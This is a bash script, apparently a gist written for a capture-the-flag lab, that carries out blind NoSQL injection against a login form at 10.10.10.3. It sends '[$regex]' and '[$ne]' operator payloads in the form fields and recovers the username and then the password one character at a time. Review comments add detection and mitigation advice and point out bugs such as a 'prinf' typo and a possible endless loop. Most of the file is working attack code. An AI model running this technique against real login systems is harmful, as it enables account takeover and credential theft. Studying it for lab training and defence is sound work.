@laztname
Created June 15, 2020 17:44
NoSQL injection data extraction.
#!/bin/bash
# for education purpose only.
# this is a labs.retas.io hellbound challenges.
# created just for fun.
#
# Blind, response-content-based extraction against a lab login form.
# Every request below is a POST to http://10.10.10.3/login/login.php whose
# form fields are written as `username[$regex]=...` / `password[$ne]=...`;
# presumably the server's body parser turns the bracketed key into an
# object that is handed to a MongoDB-style query unchanged (hence the page
# title). The only oracle used is whether the HTML response body contains
# the string "login salah" / "salah" ("wrong login" in Indonesian).
#
# NOTE(review): defensive reading of this script --
#   * Detection: login POSTs whose field *names* carry `[$regex]` or
#     `[$ne]`, arriving in a tight sequence with an incrementing `.{N}`
#     quantifier, are the signature of this technique in web/WAF logs.
#   * Mitigation: the technique only works because the application accepts
#     an object where it expects a string. Rejecting non-scalar values for
#     credential fields (or casting them to string) before the query is
#     built removes the primitive entirely.
#
# NOTE(review): script hygiene, left untouched below -- no `set -euo
# pipefail`; the builtin name `exec` is reused as a variable (legal in bash
# but confusing); `expr` is used where `$(( len - 1 ))` would do; several
# `printf` calls pass interpolated data as the *format* string; the length
# probes follow redirects (`curl -L`) while the character probes do not.
#
# Phase 1: probe the username length.
for len in {1..20};
do
# `.{len}` (unanchored) matches any username of at least `len` characters;
# the `$ne` clause is presumably satisfied by any real password.
post="username[\$regex]=.{$len}&password[\$ne]=hax0r"
exec=$(curl -Ls 'http://10.10.10.3/login/login.php' -H 'User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_13_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.84 Safari/537.36' -H 'Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8' -H 'Accept-Language: en-US,en;q=0.5' --compressed -H 'Content-Type: application/x-www-form-urlencoded' -H 'Origin: http://10.10.10.3' -H 'DNT: 1' -H 'Connection: keep-alive' -H 'Referer: http://10.10.10.3/login/' -H 'Upgrade-Insecure-Requests: 1' -H 'Pragma: no-cache' -H 'Cache-Control: no-cache' --data "$post")
printf "check panjang username: $len\r"
# First length that fails to match: the real length is the previous one.
if [[ $exec == *"login salah"* ]]
then
len=$(expr $len - 1)
# NOTE(review): `prinf` is a typo for `printf`; this line emits
# "command not found" on stderr and the message is never printed.
prinf "\n\n[+] panjang user: $len\r\n"
break
fi
done
# `len` now holds the number of characters still unknown once one more
# character has been fixed by the next phase.
len=$(expr $len - 1)
# Phase 2: recover the username one character at a time.
while true; do
for char in {a..z} {A..Z};
do
# known prefix + one candidate character + `len` wildcard characters
post="username[\$regex]=$payload$char.{$len}&password[\$ne]=hax0r"
exec=$(curl -s 'http://10.10.10.3/login/login.php' -H 'User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_13_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.84 Safari/537.36' -H 'Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8' -H 'Accept-Language: en-US,en;q=0.5' --compressed -H 'Content-Type: application/x-www-form-urlencoded' -H 'Origin: http://10.10.10.3' -H 'DNT: 1' -H 'Connection: keep-alive' -H 'Referer: http://10.10.10.3/login/' -H 'Upgrade-Insecure-Requests: 1' -H 'Pragma: no-cache' -H 'Cache-Control: no-cache' --data "$post")
printf "check user: $post\r"
# A response without "salah" means the candidate character was accepted.
if [[ $exec != *"salah"* ]]
then
len=$(expr $len - 1)
payload=$payload$char
echo
printf "\n\n[+] found string: $payload\r\n"
break
fi
done
# NOTE(review): the only exit from `while true` is `len == -1`. If the
# inner loop finishes without a match, `len` is unchanged and the same 52
# requests are re-sent indefinitely.
if [[ $len == -1 ]]
then
printf "\n\n[+] username: $payload\r\n"
break
fi
done
# Keep the recovered username; reset the prefix accumulator for phase 3/4.
username=$payload
payload=
# Phase 3: probe the password length (same oracle as phase 1).
for len in {1..20};
do
post="username=$username&password[\$regex]=.{$len}"
exec=$(curl -Ls 'http://10.10.10.3/login/login.php' -H 'User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_13_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.84 Safari/537.36' -H 'Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8' -H 'Accept-Language: en-US,en;q=0.5' --compressed -H 'Content-Type: application/x-www-form-urlencoded' -H 'Origin: http://10.10.10.3' -H 'DNT: 1' -H 'Connection: keep-alive' -H 'Referer: http://10.10.10.3/login/' -H 'Upgrade-Insecure-Requests: 1' -H 'Pragma: no-cache' -H 'Cache-Control: no-cache' --data "$post")
printf "$post\r"
if [[ $exec == *"login salah"* ]]
then
len=$(expr $len - 1)
printf "\n\n[+] panjang password: $len\r\n"
break
fi
done
len=$(expr $len - 1)
# Phase 4: recover the password one character at a time.
while true; do
for char in {a..z} {A..Z};
do
# NOTE(review): the username is hard-coded here instead of reusing
# `$username` from phase 2, unlike the length probe above.
post="username=adminhellbound&password[\$regex]=$payload$char.{$len}"
exec=$(curl -s 'http://10.10.10.3/login/login.php' -H 'User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_13_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.84 Safari/537.36' -H 'Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8' -H 'Accept-Language: en-US,en;q=0.5' --compressed -H 'Content-Type: application/x-www-form-urlencoded' -H 'Origin: http://10.10.10.3' -H 'DNT: 1' -H 'Connection: keep-alive' -H 'Referer: http://10.10.10.3/login/' -H 'Upgrade-Insecure-Requests: 1' -H 'Pragma: no-cache' -H 'Cache-Control: no-cache' --data "$post")
printf "check password: $post\r"
if [[ $exec != *"salah"* ]]
then
len=$(expr $len - 1)
payload=$payload$char
printf "\n\n$payload\r"
break
fi
# Unlike phase 2, the termination check sits inside the character loop and
# ends the whole script with `exit` rather than `break`.
if [[ $len == -1 ]]
then
echo
printf "\n\n$payload\r\n"
exit
fi
done
done